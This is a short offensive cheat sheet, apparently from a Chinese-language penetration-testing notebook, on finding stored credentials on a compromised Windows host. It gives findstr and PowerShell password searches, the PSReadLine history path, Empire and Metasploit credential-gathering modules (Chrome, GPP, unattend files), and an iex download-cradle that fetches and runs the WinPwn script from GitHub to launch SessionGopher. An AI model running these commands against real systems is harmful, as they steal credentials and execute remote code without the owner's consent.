CMD

  1. # Running these commands in the root of c:\ can produce enourmouse output.
  3. findstr /si pass *.xml *.doc *.txt *.xls
  4. findstr /si cred *.xml *.doc *.txt *.xls

Empire

  1. powershell/collection/file_finder
  2. powershell/collection/find_interesting_file
  3. powershell/credentials/sessiongopher

文件中凭据 - 图1

MSF

  1. # Meterpreter
  3. # Search by file name from parent directory
  4. search -d <Directory> -f <File>
  5. search -d c:\\shares -f *password*
  7. # Modules
  9. use post/windows/gather/enum_unattend
  10. use post/windows/gather/credentials/chrome
  11. use post/windows/gather/credentials/gpp
  12. use post/windows/gather/enum_files
  14. # Search all modules
  15. search post/windows/gather/credentials

文件中凭据 - 图2

Pwershell

  1. ls -R | select-string -Pattern password

PowerSHELL 历史记录

  1. C:\Users\{USER}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

SessionGopher

  1. $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
  2. iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
  3. sessionGopher -noninteractive -consoleoutput